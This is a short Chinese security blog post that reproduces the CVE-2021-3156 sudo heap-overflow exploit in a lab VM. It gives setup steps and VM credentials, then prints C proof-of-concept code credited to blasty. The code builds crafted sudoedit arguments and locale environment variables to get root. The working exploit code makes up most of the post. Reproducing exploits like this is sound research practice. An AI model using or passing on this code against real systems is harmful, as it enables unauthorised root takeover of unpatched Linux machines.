目前exp在ubuntu 20.04环境下稳定运行,其他linux发行版未测试
环境已经上传至百度云盘中,请关注公众号并后台回复sudo获取下载链接。
虚拟机的用户名密码为 vagrant/unicodesec
根目录中进入CVE-2021-3156文件夹中,执行make编译项目,随后执行sudo-hax-me-a-sandwich
过程如下图所示
exp代码如下
int main(int argc, char *argv[]) {
// CTF quality exploit below.
char *s_argv[]={
"sudoedit",
"-u", "root", "-s",
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\",
"\\",
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\",
NULL
};
char *s_envp[]={
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\",
"X/P0P_SH3LLZ_", "\\",
"LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
NULL
};
printf("**** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n");
execve(SUDOEDIT_PATH, s_argv, s_envp);
return 0;
}
本文作者:宽字节安全
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/163896.html
必填 您当前尚未登录。 登录? 注册
必填(保密)